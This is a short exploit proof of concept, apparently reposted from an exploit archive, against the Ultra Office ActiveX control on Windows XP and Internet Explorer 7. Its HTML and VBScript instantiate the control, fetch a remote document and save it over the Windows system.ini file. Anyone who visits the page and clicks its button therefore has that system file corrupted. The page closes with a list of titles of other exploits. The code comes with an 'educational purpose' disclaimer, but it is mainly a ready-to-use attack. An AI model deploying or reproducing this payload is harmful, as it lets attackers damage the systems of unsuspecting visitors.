-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Arbitrary File Corruption
url: http://www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://SomeSite.com/SomeFile.doc"
test.Open remURL, True
test.Save "C:WINDOWS_system.ini", True
End Sub
</script>
【Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit】相关文章:
★ Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ CodeDB (list.php lang) Local File Inclusion Vulnerability
★ trixbox (langChoice) Local File Inclusion Exploit (connect-back)
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
★ Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit